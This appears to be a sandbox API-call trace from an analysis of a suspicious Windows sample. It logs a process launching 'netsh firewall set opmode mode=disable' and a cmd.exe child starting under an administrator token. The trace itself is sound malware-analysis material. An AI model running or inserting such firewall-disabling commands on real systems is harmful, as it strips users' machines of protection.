lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="netsh firewall set opmode mode=disable", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf2e0 | out: lpCommandLine="netsh firewall set opmode mode=disable", lpProcessInformation=0x2cf2e0*(hProcess=0x50, hThread=0x54, dwProcessId=0xaa8, dwThreadId=0xaac)) returned 1 [0065.195] CloseHandle (hObject=0x54) returned 1 [0065.195] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0065.195] GetProcessHeap () returned 0x470000 [0065.195] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48eb10 | out: hHeap=0x470000) returned 1 [0065.196] GetEnvironmentStringsW () returned 0x488980* [0065.196] GetProcessHeap () returned 0x470000 [0065.196] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb0e) returned 0x48aa10 [0065.196] FreeEnvironmentStringsW (penv=0x488980) returned 1 [0065.196] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x2cebe8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x2cebe8, ReturnLength=0x0) returned 0x0 [0065.196] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffdf000, lpBuffer=0x2cec20, nSize=0x380, lpNumberOfBytesRead=0x2cebe0 | out: lpBuffer=0x2cec20*, lpNumberOfBytesRead=0x2cebe0*=0x380) returned 1 [0065.196] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x52ba0000" os_pid = "0x9c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x96c" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 14 os_tid = 0x9c4 [0046.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fd70 | out: lpSystemTimeAsFileTime=0x16fd70*(dwLowDateTime=0xf18c7b60, dwHighDateTime=0x1d4f17e)) [0046.646] GetCurrentProcessId () returned 0x9c0 [0046.646] GetCurrentThreadId () returned 0x9c4 [0046.646] GetTickCount () returned 0x1b559 [0046.646] QueryPerformanceCounter (in: lpPerformanceCount=0x16fd78 | out: lpPerformanceCount=0x16fd78*=16645492182) returned 1 [0046.647] GetModuleHandleW (lpModuleName=0x0) returned 0x4a490000 [0046.647] __set_app_type (_Type=0x1) [0046.647] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4b7810) returned 0x0 [0046.647] __getmainargs (in: _Argc=0x4a4da608, _Argv=0x4a4da618, _Env=0x4a4da610, _DoWildCard=0, _StartInfo=0x4a4be0f4 | out: _Argc=0x4a4da608, _Argv=0x4a4da618, _Env=0x4a4da610) returned 0 [0046.648] GetCurrentThreadId () returned 0x9c4 [0046.648] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c4) returned 0x3c [0046.648] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0046.648] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0046.648] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.648] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0046.648] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fd08 | out: phkResult=0x16fd08*=0x0) returned 0x2 [0046.648] VirtualQuery (in: lpAddress=0x16fcf0, lpBuffer=0x16fc70, dwLength=0x30 | out: lpBuffer=0x16fc70*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.648] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fc70, dwLength=0x30 | out: lpBuffer=0x16fc70*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.648] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fc70, dwLength=0x30 | out: lpBuffer=0x16fc70*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.648] VirtualQuery (in: lpAddress=0x74000, lpBuffer=0x16fc70, dwLength=0x30 | out: lpBuffer=0x16fc70*(BaseAddress=0x74000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.648] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fc70, dwLength=0x30 | out: lpBuffer=0x16fc70*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0046.648] GetConsoleOutputCP () returned 0x1b5 [0046.648] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4cbfe0 | out: lpCPInfo=0x4a4cbfe0) returned 1 [0046.649] SetConsoleCtrlHandler (HandlerRoutine=0x4a4b3184, Add=1) returned 1 [0046.649] _get_osfhandle (_FileHandle=1) returned 0xec [0046.649] SetConsoleMode (hConsoleHandle=0xec, dwMode=0x0) returned 0 [0046.649] _get_osfhandle (_FileHandle=1) returned 0xec [0046.649] GetConsoleMode (in: hConsoleHandle=0xec, lpMode=0x4a4be194 | out: lpMode=0x4a4be194) returned 0 [0046.649] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.649] GetConsoleMode (in: hConsoleHandle=0xa0, lpMode=0x4a4be198 | out: lpMode=0x4a4be198) returned 0 [0046.649] GetEnvironmentStringsW () returned 0x2a8a60* [0046.649] GetProcessHeap () returned 0x290000 [0046.649] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0xa7c) returned 0x2a94f0 [0046.649] FreeEnvironmentStringsW (penv=0x2a8a60) returned 1 [0046.650] GetProcessHeap () returned 0x290000 [0046.650] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x8) returned 0x2a88e0 [0046.650] GetEnvironmentStringsW () returned 0x2a8a60* [0046.650] GetProcessHeap () returned 0x290000 [0046.650] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0xa7c) returned 0x2a9f80 [0046.650] FreeEnvironmentStringsW (penv=0x2a8a60) returned 1 [0046.650] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ebc8 | out: phkResult=0x16ebc8*=0x44) returned 0x0 [0046.650] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x0, lpData=0x16ebe0*=0x18, lpcbData=0x16ebc4*=0x1000) returned 0x2 [0046.650] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x4, lpData=0x16ebe0*=0x1, lpcbData=0x16ebc4*=0x4) returned 0x0 [0046.650] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x0, lpData=0x16ebe0*=0x1, lpcbData=0x16ebc4*=0x1000) returned 0x2 [0046.650] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x4, lpData=0x16ebe0*=0x0, lpcbData=0x16ebc4*=0x4) returned 0x0 [0046.650] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x4, lpData=0x16ebe0*=0x40, lpcbData=0x16ebc4*=0x4) returned 0x0 [0046.650] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x4, lpData=0x16ebe0*=0x40, lpcbData=0x16ebc4*=0x4) returned 0x0 [0046.650] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x0, lpData=0x16ebe0*=0x40, lpcbData=0x16ebc4*=0x1000) returned 0x2 [0046.650] RegCloseKey (hKey=0x44) returned 0x0 [0046.650] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ebc8 | out: phkResult=0x16ebc8*=0x44) returned 0x0 [0046.650] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x0, lpData=0x16ebe0*=0x40, lpcbData=0x16ebc4*=0x1000) returned 0x2 [0046.650] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x4, lpData=0x16ebe0*=0x1, lpcbData=0x16ebc4*=0x4) returned 0x0 [0046.650] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x0, lpData=0x16ebe0*=0x1, lpcbData=0x16ebc4*=0x1000) returned 0x2 [0046.650] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x4, lpData=0x16ebe0*=0x0, lpcbData=0x16ebc4*=0x4) returned 0x0 [0046.651] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x4, lpData=0x16ebe0*=0x9, lpcbData=0x16ebc4*=0x4) returned 0x0 [0046.651] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x4, lpData=0x16ebe0*=0x9, lpcbData=0x16ebc4*=0x4) returned 0x0 [0046.651] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ebc0, lpData=0x16ebe0, lpcbData=0x16ebc4*=0x1000 | out: lpType=0x16ebc0*=0x0, lpData=0x16ebe0*=0x9, lpcbData=0x16ebc4*=0x1000) returned 0x2 [0046.651] RegCloseKey (hKey=0x44) returned 0x0 [0046.651] time (in: timer=0x0 | out: timer=0x0) returned 0x5cb110de [0046.651] srand (_Seed=0x5cb110de) [0046.651] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0046.651] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0046.651] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4cc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.651] GetProcessHeap () returned 0x290000 [0046.651] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x218) returned 0x2aaa10 [0046.651] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2aaa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0046.651] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.651] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.651] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0046.651] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0046.651] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0046.651] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0046.652] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0046.652] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0046.652] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0046.652] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0046.652] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0046.652] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0046.652] GetProcessHeap () returned 0x290000 [0046.652] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2a94f0 | out: hHeap=0x290000) returned 1 [0046.652] GetEnvironmentStringsW () returned 0x2a8a60* [0046.652] GetProcessHeap () returned 0x290000 [0046.652] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0xa94) returned 0x2aac30 [0046.652] FreeEnvironmentStringsW (penv=0x2a8a60) returned 1 [0046.652] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.652] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0046.652] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0046.652] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0046.652] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0046.652] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0046.652] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0046.652] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0046.652] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0046.652] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0046.652] GetProcessHeap () returned 0x290000 [0046.652] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x5c) returned 0x2ab6d0 [0046.653] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f9d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x16f9d0, lpFilePart=0x16f9b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f9b0*="Desktop") returned 0x25 [0046.653] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.653] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f6e0 | out: lpFindFileData=0x16f6e0) returned 0x2ab740 [0046.653] FindClose (in: hFindFile=0x2ab740 | out: hFindFile=0x2ab740) returned 1 [0046.653] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x16f6e0 | out: lpFindFileData=0x16f6e0) returned 0x2ab740 [0046.653] FindClose (in: hFindFile=0x2ab740 | out: hFindFile=0x2ab740) returned 1 [0046.653] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0046.653] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x16f6e0 | out: lpFindFileData=0x16f6e0) returned 0x2ab740 [0046.653] FindClose (in: hFindFile=0x2ab740 | out: hFindFile=0x2ab740) returned 1 [0046.653] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.653] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0046.653] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0046.653] GetProcessHeap () returned 0x290000 [0046.653] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2aac30 | out: hHeap=0x290000) returned 1 [0046.653] GetEnvironmentStringsW () returned 0x2ab740* [0046.654] GetProcessHeap () returned 0x290000 [0046.654] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0xae8) returned 0x2ac230 [0046.654] FreeEnvironmentStringsW (penv=0x2ab740) returned 1 [0046.654] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4cc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.654] GetProcessHeap () returned 0x290000 [0046.654] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2ab6d0 | out: hHeap=0x290000) returned 1 [0046.654] GetProcessHeap () returned 0x290000 [0046.654] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x4016) returned 0x2acd20 [0046.654] GetProcessHeap () returned 0x290000 [0046.654] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2acd20 | out: hHeap=0x290000) returned 1 [0046.654] GetConsoleOutputCP () returned 0x1b5 [0046.654] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4cbfe0 | out: lpCPInfo=0x4a4cbfe0) returned 1 [0046.655] GetUserDefaultLCID () returned 0x409 [0046.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a4c7b50, cchData=8 | out: lpLCData=":") returned 2 [0046.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fae0, cchData=128 | out: lpLCData="0") returned 2 [0046.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fae0, cchData=128 | out: lpLCData="0") returned 2 [0046.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fae0, cchData=128 | out: lpLCData="1") returned 2 [0046.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a4da740, cchData=8 | out: lpLCData="/") returned 2 [0046.655] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a4da4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0046.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a4da460, cchData=32 | out: lpLCData="Tue") returned 4 [0046.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a4da420, cchData=32 | out: lpLCData="Wed") returned 4 [0046.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a4da3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0046.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a4da3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0046.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a4da360, cchData=32 | out: lpLCData="Sat") returned 4 [0046.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a4da700, cchData=32 | out: lpLCData="Sun") returned 4 [0046.656] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a4c7b40, cchData=8 | out: lpLCData=".") returned 2 [0046.656] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a4da4e0, cchData=8 | out: lpLCData=",") returned 2 [0046.656] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0046.657] GetProcessHeap () returned 0x290000 [0046.657] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x20c) returned 0x2a95c0 [0046.657] GetConsoleTitleW (in: lpConsoleTitle=0x2a95c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.657] _get_osfhandle (_FileHandle=1) returned 0xec [0046.657] GetFileType (hFile=0xec) returned 0x3 [0046.657] BrandingFormatString () returned 0x2a97e0 [0046.669] GetVersion () returned 0x1db10106 [0046.669] _vsnwprintf (in: _Buffer=0x16fc50, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x16fbe8 | out: _Buffer="6.1.7601") returned 8 [0046.670] _get_osfhandle (_FileHandle=1) returned 0xec [0046.670] GetFileType (hFile=0xec) returned 0x3 [0046.670] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a4d6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0046.670] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a4d6340, nSize=0x2000, Arguments=0x16fbf0 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0046.670] _get_osfhandle (_FileHandle=1) returned 0xec [0046.670] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0046.670] WriteFile (in: hFile=0xec, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x16fb78, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x16fb78*=0x24, lpOverlapped=0x0) returned 1 [0046.670] _vsnwprintf (in: _Buffer=0x4a4d6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16fc18 | out: _Buffer="\r\n") returned 2 [0046.670] _get_osfhandle (_FileHandle=1) returned 0xec [0046.670] GetFileType (hFile=0xec) returned 0x3 [0046.670] _get_osfhandle (_FileHandle=1) returned 0xec [0046.670] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0046.670] WriteFile (in: hFile=0xec, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16fbe8, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x16fbe8*=0x2, lpOverlapped=0x0) returned 1 [0046.670] _vsnwprintf (in: _Buffer=0x4a4d6340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x16fc18 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0046.670] _get_osfhandle (_FileHandle=1) returned 0xec [0046.670] GetFileType (hFile=0xec) returned 0x3 [0046.670] _get_osfhandle (_FileHandle=1) returned 0xec [0046.671] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0046.671] WriteFile (in: hFile=0xec, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x16fbe8, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x16fbe8*=0x3f, lpOverlapped=0x0) returned 1 [0046.671] _vsnwprintf (in: _Buffer=0x4a4d6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16fc18 | out: _Buffer="\r\n") returned 2 [0046.671] _get_osfhandle (_FileHandle=1) returned 0xec [0046.671] GetFileType (hFile=0xec) returned 0x3 [0046.671] _get_osfhandle (_FileHandle=1) returned 0xec [0046.671] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0046.671] WriteFile (in: hFile=0xec, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16fbe8, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x16fbe8*=0x2, lpOverlapped=0x0) returned 1 [0046.671] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0046.671] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0046.671] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0046.671] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0046.671] _get_osfhandle (_FileHandle=0) returned 0xa0 [0046.671] GetFileType (hFile=0xa0) returned 0x3 [0046.671] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0046.671] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x16fa40 | out: TokenHandle=0x16fa40*=0x0) returned 0xc000007c [0046.671] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x16fa40 | out: TokenHandle=0x16fa40*=0x50) returned 0x0 [0046.671] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x16fa50, TokenInformationLength=0x4, ReturnLength=0x16fa58 | out: TokenInformation=0x16fa50, ReturnLength=0x16fa58) returned 0x0 [0046.671] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x16fa58, TokenInformationLength=0x4, ReturnLength=0x16fa50 | out: TokenInformation=0x16fa58, ReturnLength=0x16fa50) returned 0x0 [0046.672] NtClose (Handle=0x50) returned 0x0 [0046.672] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x16fa20, nSize=0x0, Arguments=0x16fa28 | out: lpBuffer="\x97e0\x2a") returned 0xf [0046.672] GetProcessHeap () returned 0x290000 [0046.672] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x8, Size=0x218) returned 0x291ab0 [0046.672] GetConsoleTitleW (in: lpConsoleTitle=0x16fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.672] wcsstr (_Str="C:\\Windows\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0046.672] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 